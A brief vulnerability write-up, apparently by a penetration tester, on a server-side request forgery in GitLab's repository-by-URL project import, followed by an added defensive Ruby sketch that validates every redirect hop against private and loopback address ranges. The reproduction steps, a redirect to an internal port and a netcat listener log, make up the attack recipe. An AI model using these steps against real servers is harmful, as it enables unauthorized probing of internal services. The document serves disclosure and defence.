[GITLAB] — Server Side Request Forgery in “Project Import” page.

  1. Create a new project.
  2. Import Project — Repo by URL.
  3. Fill in the URL field with my VPS URL, http://<IP>/redirect.php.
  4. Click Create Project.

root@debian:/home/test# nc -lvvp 1339
listening on [any] 1339 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 39282
GET / HTTP/1.1
Host: localhost:1339
User-Agent: git/2.14.3
Accept: */*
Accept-Encoding: gzip
Pragma: no-cach
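
A defensive sketch of the check this finding calls for, added here and not taken from GitLab's code or the original post: every redirect hop of an import URL is validated against loopback and private ranges before it would be fetched. It assumes redirect.php answers with a redirect to http://localhost:1339/ (inferred from the netcat output above); the helper names, 203.0.113.10 and the sample tables are constructed for illustration.

```ruby
require 'uri'
require 'ipaddr'
require 'resolv'

# Loopback, private and link-local ranges an import fetcher should not reach.
BLOCKED_NETS = %w[
  0.0.0.0/8 127.0.0.0/8 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16
  169.254.0.0/16 ::1/128 fc00::/7 fe80::/10
].map { |cidr| IPAddr.new(cidr) }.freeze
MAX_REDIRECTS = 3
SYSTEM_DNS = ->(host) { Resolv.getaddresses(host) }

# Constructed sample data: 203.0.113.10 (documentation range) stands in for
# the external host; the redirect target is an assumption, not from the page.
SAMPLE_REDIRECTS = { 'http://203.0.113.10/redirect.php' => 'http://localhost:1339/' }.freeze
SAMPLE_DNS = { 'localhost' => ['127.0.0.1'] }.freeze

# IP literals are used directly; host names go through the resolver.
def addresses_for(host, resolver)
  [IPAddr.new(host)]
rescue IPAddr::InvalidAddressError
  resolver.call(host).map { |addr| IPAddr.new(addr) }
end

# True only for http(s) URLs whose host resolves exclusively to public IPs.
def allowed_url?(url, resolver = SYSTEM_DNS)
  uri = URI.parse(url)
  return false unless %w[http https].include?(uri.scheme) && uri.hostname
  ips = addresses_for(uri.hostname, resolver).map(&:native) # unwrap ::ffff:a.b.c.d
  blocked = ips.any? do |ip|
    BLOCKED_NETS.any? { |net| net.family == ip.family && net.include?(ip) }
  end
  ips.any? && !blocked
rescue URI::InvalidURIError, IPAddr::Error
  false
end

# Validate every hop before it would be fetched, not just the submitted URL.
# next_location: callable returning a URL's redirect target, or nil if none.
def check_import(url, next_location, resolver = SYSTEM_DNS)
  (MAX_REDIRECTS + 1).times do
    return [:blocked, url] unless allowed_url?(url, resolver)
    target = next_location.call(url)
    return [:ok, url] if target.nil?
    url = URI.join(url, target).to_s
  end
  [:blocked, url] # redirect limit exceeded
end
```

The submitted URL passes on its own; only the second hop is rejected, which is why validating the form field alone does not stop this request. A real fetcher should also connect to the address it validated, since a second DNS lookup at fetch time can return a different answer.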

Penetration Tester https://www.linkedin.com/in/ltsirkov/

Lyubomir Tsirkov
